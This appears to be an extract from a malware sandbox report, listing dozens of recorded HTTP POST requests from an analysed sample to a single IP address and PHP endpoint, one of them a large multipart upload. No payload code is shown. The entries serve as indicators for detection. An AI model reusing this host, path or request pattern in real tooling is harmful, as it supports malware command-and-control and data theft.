                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 1384Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2512Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2000Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: multipart/form-data; boundary=----w7zdkfYFEzY2KpKGQqqzrcAd64jvRvQWOrUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 169482Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2080Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2512Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2092Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2108Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continue
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: POST /Test/Authpython/eternalUniversal7/EternalRequestTest/Testdatalife/processorWindowsDatalifepublic.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: 86.110.194.28Content-Length: 2516Expect: 100-continueConnection: Keep-Alive
